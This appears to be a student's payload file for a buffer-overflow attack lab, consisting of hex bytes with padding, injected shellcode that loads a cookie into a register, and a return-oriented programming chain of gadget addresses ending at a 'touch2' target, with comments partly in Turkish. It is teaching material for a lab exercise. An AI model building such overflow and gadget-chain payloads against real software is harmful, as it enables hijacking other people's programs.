48 c7 c7 63 a4 40 17 48 c7 c6 18 29 d0 05 c3 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 
/* 72 0s          4*16+8 */

c9 19 40 00 00 00 00 00 /* pop rax */ /* <setval_343+2> */
63 a4 40 17 00 00 00 00 /* cookie */
12 1a 40 00 00 00 00 00 /* mov rax rbx */ /* <setval_483+2> */
e4 19 40 00 00 00 00 00 /* mov rbx rdi */ /* <setval_308+3> */

b9 19 40 00 00 00 00 00 /* pop rdx */ /* <setval_203+5> */
63 a4 40 17 00 00 00 00 /* cookie */
f0 19 40 00 00 00 00 00 /* mov rdx rcx */ /* <setval_278+2> */
50 1a 40 00 00 00 00 00 /* mov rcx rbp */ /* <addval_219+2> */
8b 1a 40 00 00 00 00 00 /* movl rbp rsi */ /* <addval_312+2> */
d6 19 40 00 00 00 00 00 /* sar rsi */ /* <getval_445+1> */
d6 19 40 00 00 00 00 00 /* sar rsi */ /* <getval_445+1> */


/* rdx->rcx->rbp->rsi */

86 16 40 00 00 00 00 00       /* touch2 */
/* 401686 */
/* code address 0x5563f6e8*/

/* cxookie=0x1740a463     0x5d02918 */

/*
   0:	48 c7 c7 63 a4 40 17 	mov    $0x1740a463,%rdi
   7:	48 c7 c6 18 29 d0 05 	mov    $0x5d02918,%rsi
   e:	c3                   	retq   


*/

/*
   rdi=cookie
   cookie
   rsi=rdi  veya rsi=cookie
   sar rsi
   sar rsi
   cookie 
*/
